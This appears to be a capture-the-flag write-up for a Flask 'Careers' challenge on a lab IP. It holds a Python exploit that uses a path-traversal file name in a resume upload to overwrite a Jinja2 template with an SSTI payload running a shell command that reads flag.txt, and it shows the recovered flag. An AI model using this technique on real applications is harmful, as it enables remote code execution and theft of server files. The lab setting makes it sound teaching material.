Careers

IPAddress 172.20.0.3 Port 80 URL http://172.20.0.3/

Description

Find and apply to career opportunities at TCC.

Structure

.
├── app
│   ├── __init__.py
│   ├── routes.py
│   ├── static
│   │   └── assets
│   │       ├── css
│   │       │   └── careers.css
│   │       ├── img
│   │       │   └── construction.jpg
│   │       └── js
│   ├── templates
│   │   ├── includes
│   │   │   ├── footer.html
│   │   │   ├── header.html
│   │   │   └── scripts.html
│   │   ├── index.html
│   │   └── layouts
│   │       └── base.html
│   ├── uploads
│   └── views.py
├── flag.txt
└── run.py
10 directories, 12 files

Solution

Install pip for python

sudo apt install python3-pip

Install requests for the exploit

python3 -m pip install requests

Exploit

from requests import post, get

filename = '../templates/index.html' # the index.html template path to overwrite

payload = b'{{ cycler.__init__.__globals__.os.popen(\'cat /usr/src/app/flag.txt\').read() }}' # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
files = {'file': (filename, payload, 'text/html')}

url = 'http://172.20.0.3/'
endpoint = '/api/v1/upload/resume'

response = post(url + endpoint, files = files)

response = get(url)
print(f'Flag: {response.text}')

Flag

└─$ python3 exploit.py

Flag: TCC{34$Y_USE_SECURE_FILENAME}

Explanation

PreviousCTF Setup on Kali linux NextSOC Complaints

Last updated 3 years ago

Was this helpful?